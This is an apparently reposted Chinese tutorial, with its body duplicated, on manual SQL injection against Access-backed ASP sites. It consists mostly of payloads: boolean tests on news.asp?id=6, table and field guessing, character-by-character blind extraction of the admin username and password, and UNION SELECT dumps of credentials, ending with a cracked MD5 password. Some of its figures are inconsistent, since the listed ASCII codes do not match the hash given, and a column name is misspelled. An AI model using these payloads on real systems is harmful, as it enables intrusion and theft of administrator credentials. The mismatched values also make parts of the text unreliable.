access手工注入笔记
生活随笔
收集整理的這篇文章主要介紹了
access手工注入笔记
小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
http://www.xxx.com/news.asp?id=6
注入點(diǎn) 判斷是否存在注入 兩次返回不一樣 存在注入
http://www.xxx.com/news.asp?id=6 and 1=1 http://www.xxx.com/news.asp?id=6 and 1=2 判斷數(shù)據(jù)庫(kù) 這里可能是本地問(wèn)題 沒(méi)有測(cè)試出來(lái)
and (select count(*) from msysobjects)>0? (返回權(quán)限不足access數(shù)據(jù)庫(kù))
and (select count(*) from sysobjects)>0?? (返回正常則為MSSQL數(shù)據(jù)庫(kù))
猜解表名(正常則存在admin,不正常則不存在) and exists (select * from admin) 返回正確 存在admin 我們隨便填寫一個(gè)進(jìn)去那么 返回錯(cuò)誤 不存在這個(gè)表
現(xiàn)在我們來(lái)猜解字段
and exists (select username from admin) and exists (select password from admin) 沒(méi)有出錯(cuò)證明這兩個(gè)字段都是存在 不存在的話同上 不存在字段
猜解用戶名和密碼長(zhǎng)度 and (select top 1 len(username) from admin)>0
and (select top 1 len(password) from admin)>0 猜解用戶名和密碼內(nèi)容:
and(select top 1 asc(mid(username,1,1))from admin)>97
and(select top 1 asc(mid(username,1,1))from admin)=97?
and(select top 1 asc(mid(username,2,1))from admin)=100
and(select top 1 asc(mid(username,3,1))from admin)=109
and(select top 1 asc(mid(username,4,1))from admin)=105
and(select top 1 asc(mid(username,5,1))from admin)=110 97 100 109 105 110 admin ------------------------------------------------------
and(select top 1 asc(mid(password,1,1))from admin)=52
and(select top 1 asc(mid(password,2,1))from admin)=54
and(select top 1 asc(mid(password,3,1))from admin)=57
and(select top 1 asc(mid(password,4,1))from admin)=56
and(select top 1 asc(mid(password,5,1))from admin)=48
and(select top 1 asc(mid(password,6,1))from admin)=100
and(select top 1 asc(mid(password,7,1))from admin)=51
and(select top 1 asc(mid(password,8,1))from admin)=50
and(select top 1 asc(mid(password,9,1))from admin)=99
and(select top 1 asc(mid(password,10,1))from admin)=48
and(select top 1 asc(mid(password,11,1))from admin)=53
and(select top 1 asc(mid(password,12,1))from admin)=53
and(select top 1 asc(mid(password,13,1))from admin)=57
and(select top 1 asc(mid(password,14,1))from admin)=102
and(select top 1 asc(mid(password,15,1))from admin)=56
and(select top 1 asc(mid(password,16,1))from admin)=32 52 54 57 101 56 48 100 51 50 99 48 53 53 57 102 56 32
469e80d32c0559f8 md5 解出來(lái)的密碼是admin888
=====================================================
(二)聯(lián)合查詢暴出管理帳號(hào)及密碼 先用order by 爆出字段數(shù),然后: http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin 語(yǔ)法:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 表示的是列長(zhǎng)度。
from admin 查詢對(duì)像admin表名 運(yùn)行后會(huì)出現(xiàn)兩到三個(gè)數(shù)字,如:4、12 則修改語(yǔ)句子(即在4、12中修改成列名,紅色部份):
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,usermane,5,6,7,8,9,10,11,password,13,14,15 from admin 這樣,就可以爆出管理帳戶和密碼了。當(dāng)然你也可以先爆帳戶: http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,username,5,6,7,8,9,10,11,12,13,14,15 from admin 再爆密碼:
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,password,15 from admin
注入點(diǎn) 判斷是否存在注入 兩次返回不一樣 存在注入
http://www.xxx.com/news.asp?id=6 and 1=1 http://www.xxx.com/news.asp?id=6 and 1=2 判斷數(shù)據(jù)庫(kù) 這里可能是本地問(wèn)題 沒(méi)有測(cè)試出來(lái)
and (select count(*) from msysobjects)>0? (返回權(quán)限不足access數(shù)據(jù)庫(kù))
and (select count(*) from sysobjects)>0?? (返回正常則為MSSQL數(shù)據(jù)庫(kù))
猜解表名(正常則存在admin,不正常則不存在) and exists (select * from admin) 返回正確 存在admin 我們隨便填寫一個(gè)進(jìn)去那么 返回錯(cuò)誤 不存在這個(gè)表
現(xiàn)在我們來(lái)猜解字段
and exists (select username from admin) and exists (select password from admin) 沒(méi)有出錯(cuò)證明這兩個(gè)字段都是存在 不存在的話同上 不存在字段
猜解用戶名和密碼長(zhǎng)度 and (select top 1 len(username) from admin)>0
and (select top 1 len(password) from admin)>0 猜解用戶名和密碼內(nèi)容:
and(select top 1 asc(mid(username,1,1))from admin)>97
and(select top 1 asc(mid(username,1,1))from admin)=97?
and(select top 1 asc(mid(username,2,1))from admin)=100
and(select top 1 asc(mid(username,3,1))from admin)=109
and(select top 1 asc(mid(username,4,1))from admin)=105
and(select top 1 asc(mid(username,5,1))from admin)=110 97 100 109 105 110 admin ------------------------------------------------------
and(select top 1 asc(mid(password,1,1))from admin)=52
and(select top 1 asc(mid(password,2,1))from admin)=54
and(select top 1 asc(mid(password,3,1))from admin)=57
and(select top 1 asc(mid(password,4,1))from admin)=56
and(select top 1 asc(mid(password,5,1))from admin)=48
and(select top 1 asc(mid(password,6,1))from admin)=100
and(select top 1 asc(mid(password,7,1))from admin)=51
and(select top 1 asc(mid(password,8,1))from admin)=50
and(select top 1 asc(mid(password,9,1))from admin)=99
and(select top 1 asc(mid(password,10,1))from admin)=48
and(select top 1 asc(mid(password,11,1))from admin)=53
and(select top 1 asc(mid(password,12,1))from admin)=53
and(select top 1 asc(mid(password,13,1))from admin)=57
and(select top 1 asc(mid(password,14,1))from admin)=102
and(select top 1 asc(mid(password,15,1))from admin)=56
and(select top 1 asc(mid(password,16,1))from admin)=32 52 54 57 101 56 48 100 51 50 99 48 53 53 57 102 56 32
469e80d32c0559f8 md5 解出來(lái)的密碼是admin888
=====================================================
(二)聯(lián)合查詢暴出管理帳號(hào)及密碼 先用order by 爆出字段數(shù),然后: http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin 語(yǔ)法:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 表示的是列長(zhǎng)度。
from admin 查詢對(duì)像admin表名 運(yùn)行后會(huì)出現(xiàn)兩到三個(gè)數(shù)字,如:4、12 則修改語(yǔ)句子(即在4、12中修改成列名,紅色部份):
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,usermane,5,6,7,8,9,10,11,password,13,14,15 from admin 這樣,就可以爆出管理帳戶和密碼了。當(dāng)然你也可以先爆帳戶: http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,username,5,6,7,8,9,10,11,12,13,14,15 from admin 再爆密碼:
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,password,15 from admin
轉(zhuǎn)載于:https://www.cnblogs.com/secbook/archive/2012/07/23/2654864.html
總結(jié)
以上是生活随笔為你收集整理的access手工注入笔记的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 限定虚拟机可用的CPU利用率
- 下一篇: jQuery 仿淘宝 鼠标悬停显示大图效